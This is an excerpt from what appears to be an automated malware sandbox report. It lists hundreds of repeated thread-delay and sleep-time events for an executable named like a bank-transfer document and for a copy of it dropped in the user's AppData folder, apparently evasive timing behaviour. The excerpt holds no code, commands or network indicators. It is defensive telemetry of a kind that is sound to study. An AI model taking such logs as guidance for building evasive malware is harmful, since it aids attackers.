                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 594656Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 594546Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 594436Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 594309Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 594193Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 594071Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeThread delayed: delay time: 593953Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599886Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599780Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598794Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598687Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598465Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598347Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598109Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597890Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597781Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597671Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597452Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596794Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596687Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596578Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596469Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596359Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596250Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596140Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595692Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595562Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595453Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595343Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595234Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595125Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595015Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594906Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594790Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594677Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594547Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594437Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594328Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594219Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599875
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599766
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599657
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599532
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599407
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599282
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599157
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 599047
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598932
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598813
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598694
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598579
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598454
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598329
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598219
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 598094
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597984
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597875
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597766
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597656
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597547
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597437
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597328
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597219
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597110
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 597000
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596891
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596766
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596643
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596516
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596371
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596250
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596140
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 596032
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595922
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595813
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595688
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595563
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595438
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595313
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595204
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 595079
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594954
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594829
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594704
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594579
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594454
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594329
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594204
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeThread delayed: delay time: 594079
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeWindow / User API: threadDelayed 2637Jump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exeWindow / User API: threadDelayed 7209Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow / User API: threadDelayed 2154Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow / User API: threadDelayed 7695Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow / User API: threadDelayed 2803
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeWindow / User API: threadDelayed 7021
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -31359464925306218s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -599885s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -599672s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -599514s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -599382s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -599208s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -599092s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -598969s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -598859s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -598750s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -598640s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -598531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -598422s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -598312s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -598203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -598094s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -597969s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -597859s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -597750s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -597624s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -597515s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -597406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -597296s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -597187s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -597078s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -596878s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -596764s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -596655s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -596531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -596422s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -596312s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -596203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -596094s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -595982s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -595873s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -595750s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -595640s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -595531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -595422s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -595312s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -595203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -595094s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -594984s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -594875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -594765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -594656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -594546s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -594436s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -594309s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -594193s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -594071s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\rMT103_126021720924.exe TID: 1004Thread sleep time: -593953s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7272Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep count: 35 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7472Thread sleep count: 2154 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -599886s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7472Thread sleep count: 7695 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -599780s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -599672s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -599562s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -599453s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -599343s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -599234s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -599125s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -599015s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -598906s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -598794s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -598687s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -598578s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -598465s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -598347s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -598219s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -598109s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -598000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -597890s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -597781s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -597671s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -597562s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -597452s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -597343s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -597234s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -597125s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -597015s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -596906s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -596794s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -596687s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -596578s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -596469s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -596359s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -596250s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -596140s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -595692s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -595562s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -595453s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -595343s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -595234s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -595125s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -595015s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -594906s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -594790s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -594677s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -594547s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -594437s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -594328s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7464Thread sleep time: -594219s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7664Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -32281802128991695s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -599875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -599766s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -599657s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -599532s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -599407s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -599282s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -599157s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -599047s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -598932s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -598813s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -598694s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -598579s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -598454s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -598329s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -598219s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -598094s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -597984s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -597875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -597766s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -597656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -597547s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -597437s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -597328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe TID: 7816Thread sleep time: -597219s >= -30000s
